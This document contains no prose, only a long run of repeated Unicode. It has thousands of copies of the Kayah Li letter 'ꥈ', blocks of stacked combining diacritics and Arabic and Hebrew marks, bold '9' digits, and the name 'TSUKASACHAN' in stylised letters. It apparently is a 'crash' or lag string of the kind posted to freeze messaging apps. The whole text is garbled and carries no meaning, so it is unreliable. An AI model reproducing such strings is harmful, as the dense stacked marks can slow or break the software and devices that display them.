ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈᳓ࣰًًًًً᳕ܾࣶࣶ֖֖᷽ۡ᪳ࣧࣧ᪳́ࣼ᳚᪳־᱃ֻࣰࣱࣱࣱٍ᳕͙͙ࣹ͙ࣹ͙ࣩ̫̫᳕͙᳕͙ࣹ͙̫ࣩ̈٘ͧ٘ۛ٘̈ͧ̈̈̃ۡۛ̈ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝟗𝙏𝙎𝙐𝙆𝘼𝙎𝘼𝘾𝙃𝘼𝙉𝙏𝙎𝙐𝙆𝘼𝙎𝘼𝘾𝙃𝘼𝙉𝙏𝙎𝙐𝙆𝘼𝙎𝘼𝘾𝙃𝘼𝙉𝙏𝙎𝙐𝙆𝘼𝙎𝘼𝘾𝙃𝘼𝙉ꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈꥈ